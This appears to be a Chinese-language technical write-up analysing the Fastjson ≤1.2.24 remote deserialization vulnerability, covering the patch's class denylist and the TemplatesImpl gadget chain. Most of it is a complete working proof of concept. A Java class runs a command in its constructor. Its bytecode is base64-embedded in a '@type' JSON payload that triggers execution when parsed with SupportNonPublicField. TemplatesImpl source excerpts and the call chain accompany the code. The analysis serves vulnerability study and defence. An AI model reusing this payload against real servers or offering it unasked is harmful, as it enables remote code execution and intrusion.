Fastjson遠(yuǎn)程反序列化程序驗(yàn)證的構(gòu)造和分析
fastjson是一個(gè)java編寫的高性能功能非常完善的JSON庫(kù),應(yīng)用范圍非常廣,在github上star數(shù)都超過(guò)8k,在2017年3月15日,fastjson官方主動(dòng)爆出fastjson在1.2.24及之前版本存在遠(yuǎn)程代碼執(zhí)行高危安全漏洞。攻擊者可以通過(guò)此漏洞遠(yuǎn)程執(zhí)行惡意代碼來(lái)入侵服務(wù)器。
關(guān)于漏洞的具體詳情可參考 :https://github.com/alibaba/fastjson/wiki/security_update_20170315
受影響的版本
- fastjson <= 1.2.24
靜態(tài)分析
根據(jù)官方給出的補(bǔ)丁文件,主要的更新在這個(gè)checkAutoType函數(shù)上,而這個(gè)函數(shù)的主要功能就是添加了黑名單,將一些常用的反序列化利用庫(kù)都添加到黑名單中。
具體包括:
- bsh,com.mchange,com.sun.,java.lang.Thread,java.net.Socket,java.rmi,javax.xml,org.apache.bcel,org.apache.commons.beanutils,
- org.apache.commons.collections.Transformer,org.apache.commons.collections.functors,org.apache.commons.collections4.
- comparators,org.apache.commons.fileupload,org.apache.myfaces.context.servlet,org.apache.tomcat,org.apache.wicket.util,
- org.codehaus.groovy.runtime,org.hibernate,org.jboss,org.mozilla.javascript,org.python.core,org.springframework
下面我們來(lái)分析checkAutoType的函數(shù)實(shí)現(xiàn):
- if (typeName == null) {
- return null;
- }
- if (typeName.length() >= maxTypeNameLength) {
- throw new JSONException("autoType is not support. " + typeName);
- }
- final String className = typeName.replace('$', '.');
- if (autoTypeSupport || expectClass != null) {
- for (int i = 0; i < acceptList.length; ++i) {
- String accept = acceptList[i];
- if (className.startsWith(accept)) {
- return TypeUtils.loadClass(typeName, defaultClassLoader);
- }
- }
- for (int i = 0; i < denyList.length; ++i) {
- String deny = denyList[i];
- if (className.startsWith(deny)) {
- throw new JSONException("autoType is not support. " + typeName);
- }
- }
- }
- Class<?> clazz = TypeUtils.getClassFromMapping(typeName);
- if (clazz == null) {
- clazz = deserializers.findClass(typeName);
- }
- if (clazz != null) {
- if (expectClass != null && !expectClass.isAssignableFrom(clazz)) {
- throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName());
- }
- return clazz;
- }
核心部分就是denyList的處理過(guò)程,遍歷denyList,如果引入的庫(kù)以denyList中某個(gè)deny打頭,就會(huì)拋出異常,中斷運(yùn)行。
程序驗(yàn)證構(gòu)造
靜態(tài)分析得知,要構(gòu)造一個(gè)可用的程序,肯定得引入denyList的庫(kù)。剛開始fastjson官方公布漏洞信息時(shí),當(dāng)時(shí)就嘗試構(gòu)造驗(yàn)證程序,怎奈fastjson的代碼確實(shí)龐大,還有asm機(jī)制,通過(guò)asm機(jī)制生成的臨時(shí)代碼下不了斷點(diǎn)。當(dāng)時(shí)也只能通過(guò)在通過(guò)類初始化的時(shí)候彈出一個(gè)計(jì)算器,很顯然這個(gè)構(gòu)造方式不具有通用性,最近jackson爆出反序列漏洞,其中就利用了TemplatesImpl類,而這個(gè)類有一個(gè)字段就是_bytecodes,有部分函數(shù)會(huì)根據(jù)這個(gè)_bytecodes生成java實(shí)例,簡(jiǎn)直不能再更妙,這就解決了fastjson通過(guò)字段傳入一個(gè)類,再通過(guò)這個(gè)類執(zhí)行有害代碼。后來(lái)閱讀ysoserial的代碼時(shí)也發(fā)現(xiàn)在gadgets.java這個(gè)文件中也使用到了這個(gè)類來(lái)動(dòng)態(tài)生成可執(zhí)行命令的代碼。
下面是一個(gè)程序驗(yàn)證的代碼:
- import com.sun.org.apache.xalan.internal.xsltc.DOM;
- import com.sun.org.apache.xalan.internal.xsltc.TransletException;
- import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
- import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
- import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
- import java.io.IOException;
- public class Test extends AbstractTranslet {
- public Test() throws IOException {
- Runtime.getRuntime().exec("calc");
- }
- @Override
- public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {
- }
- @Override
- public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws TransletException {
- }
- public static void main(String[] args) throws Exception {
- Test t = new Test();
- }
- }
這個(gè)是Test.java的實(shí)現(xiàn),在Test.java的構(gòu)造函數(shù)中執(zhí)行了一條命令,彈出計(jì)算器。編譯Test.java得到Test.class供后續(xù)使用。后續(xù)會(huì)將Test.class的內(nèi)容賦值給_bytecodes。讓我們接著分析:
- package person;
- import com.alibaba.fastjson.JSON;
- import com.alibaba.fastjson.parser.Feature;
- import com.alibaba.fastjson.parser.ParserConfig;
- import org.apache.commons.io.IOUtils;
- import org.apache.commons.codec.binary.Base64;
- import java.io.ByteArrayOutputStream;
- import java.io.File;
- import java.io.FileInputStream;
- import java.io.IOException;
- /**
- * Created by web on 2017/4/29.
- */
- public class P{
- public static String readClass(String cls){
- ByteArrayOutputStream bos = new ByteArrayOutputStream();
- try {
- IOUtils.copy(new FileInputStream(new File(cls)), bos);
- } catch (IOException e) {
- e.printStackTrace();
- }
- return Base64.encodeBase64String(bos.toByteArray());
- }
- public static void test_autoTypeDeny() throws Exception {
- ParserConfig config = new ParserConfig();
- final String fileSeparator = System.getProperty("file.separator");
- final String evilClassPath = System.getProperty("user.dir") + "\\target\\classes\\person\\Test.class";
- String evilCode = readClass(evilClassPath);
- final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
- String text1 = "{\"@type\":\"" + NASTY_CLASS +
- "\",\"_bytecodes\":[\""+evilCode+"\"],'_name':'a.b',\"_outputProperties\":{ }," +
- "\"_name\":\"a\",\"_version\":\"1.0\",\"allowedProtocols\":\"all\"}\n";
- System.out.println(text1);
- Object obj = JSON.parseObject(text1, Object.class, config, Feature.SupportNonPublicField);
- //assertEquals(Model.class, obj.getClass());
- }
- public static void main(String args[]){
- try {
- test_autoTypeDeny();
- } catch (Exception e) {
- e.printStackTrace();
- }
- }
- }
在這個(gè)程序驗(yàn)證代碼中,最核心的部分是_bytecodes,它是要執(zhí)行的代碼,@type是指定的解析類,fastjson會(huì)根據(jù)指定類去反序列化得到該類的實(shí)例,在默認(rèn)情況下,fastjson只會(huì)反序列化公開的屬性和域,而com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl中_bytecodes卻是私有屬性,_name也是私有域,所以在parseObject的時(shí)候需要設(shè)置Feature.SupportNonPublicField,這樣_bytecodes字段才會(huì)被反序列化。_tfactory這個(gè)字段在TemplatesImpl既沒(méi)有g(shù)et方法也沒(méi)有set方法,所以是設(shè)置不了的,彈計(jì)算器的圖中展示了但是實(shí)際運(yùn)行卻沒(méi)有使用,只能依賴于jdk的實(shí)現(xiàn),作者在1.8.0_25,1.7.0_05測(cè)試都能彈出計(jì)算器,某些版本中在defineTransletClasses()用到會(huì)引用_tfactory屬性導(dǎo)致異常退出。
接下來(lái)我們看下TemplatesImpl.java的幾個(gè)關(guān)鍵函數(shù):
- public synchronized Properties getOutputProperties() {
- try {
- return newTransformer().getOutputProperties();
- }
- catch (TransformerConfigurationException e) {
- return null;
- }
- }
- public synchronized Transformer newTransformer()
- throws TransformerConfigurationException
- {
- TransformerImpl transformer;
- transformer = new TransformerImpl(getTransletInstance(), _outputProperties,
- _indentNumber, _tfactory);
- if (_uriResolver != null) {
- transformer.setURIResolver(_uriResolver);
- }
- if (_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING)) {
- transformer.setSecureProcessing(true);
- }
- return transformer;
- }
- private Translet getTransletInstance()
- throws TransformerConfigurationException {
- try {
- if (_name == null) return null;
- if (_class == null) defineTransletClasses();
- // The translet needs to keep a reference to all its auxiliary
- // class to prevent the GC from collecting them
- AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();
- translet.postInitialization();
- translet.setTemplates(this);
- translet.setServicesMechnism(_useServicesMechanism);
- if (_auxClasses != null) {
- translet.setAuxiliaryClasses(_auxClasses);
- }
- return translet;
- }
- catch (InstantiationException e) {
- ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
- throw new TransformerConfigurationException(err.toString());
- }
- catch (IllegalAccessException e) {
- ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
- throw new TransformerConfigurationException(err.toString());
- }
- }
- private void defineTransletClasses()
- throws TransformerConfigurationException {
- if (_bytecodes == null) {
- ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
- throw new TransformerConfigurationException(err.toString());
- }
- TransletClassLoader loader = (TransletClassLoader)
- AccessController.doPrivileged(new PrivilegedAction() {
- public Object run() {
- return new TransletClassLoader(ObjectFactory.findClassLoader());
- }
- });
- try {
- final int classCount = _bytecodes.length;
- _class = new Class[classCount];
- if (classCount > 1) {
- _auxClasses = new Hashtable();
- }
- for (int i = 0; i < classCount; i++) {
- _class[i] = loader.defineClass(_bytecodes[i]);
- final Class superClass = _class[i].getSuperclass();
- // Check if this is the main class
- if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
- _transletIndex = i;
- }
- else {
- _auxClasses.put(_class[i].getName(), _class[i]);
- }
- }
- if (_transletIndex < 0) {
- ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
- throw new TransformerConfigurationException(err.toString());
- }
- }
- catch (ClassFormatError e) {
- ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_CLASS_ERR, _name);
- throw new TransformerConfigurationException(err.toString());
- }
- catch (LinkageError e) {
- ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);
- throw new TransformerConfigurationException(err.toString());
- }
- }
在getTransletInstance調(diào)用defineTransletClasses,在defineTransletClasses方法中會(huì)根據(jù)_bytecodes來(lái)生成一個(gè)java類,生成的java類隨后會(huì)被getTransletInstance方法用到生成一個(gè)實(shí)例,也也就到了最終的執(zhí)行命令的位置Runtime.getRuntime.exec()
下面我們上一張調(diào)用鏈的圖:
簡(jiǎn)單來(lái)說(shuō)就是:
- JSON.parseObject
- ...
- JavaBeanDeserializer.deserialze
- ...
- FieldDeserializer.setValue
- ...
- TemplatesImpl.getOutputProperties
- TemplatesImpl.newTransformer
- TemplatesImpl.getTransletInstance
- ...
- Runtime.getRuntime().exec
附上一張成功執(zhí)行圖:
總結(jié)
該程序驗(yàn)證的影響jdk 1.7,1.8版本,1.6未測(cè)試,但是需要在parseObject的時(shí)候設(shè)置Feature.SupportNonPublicField。
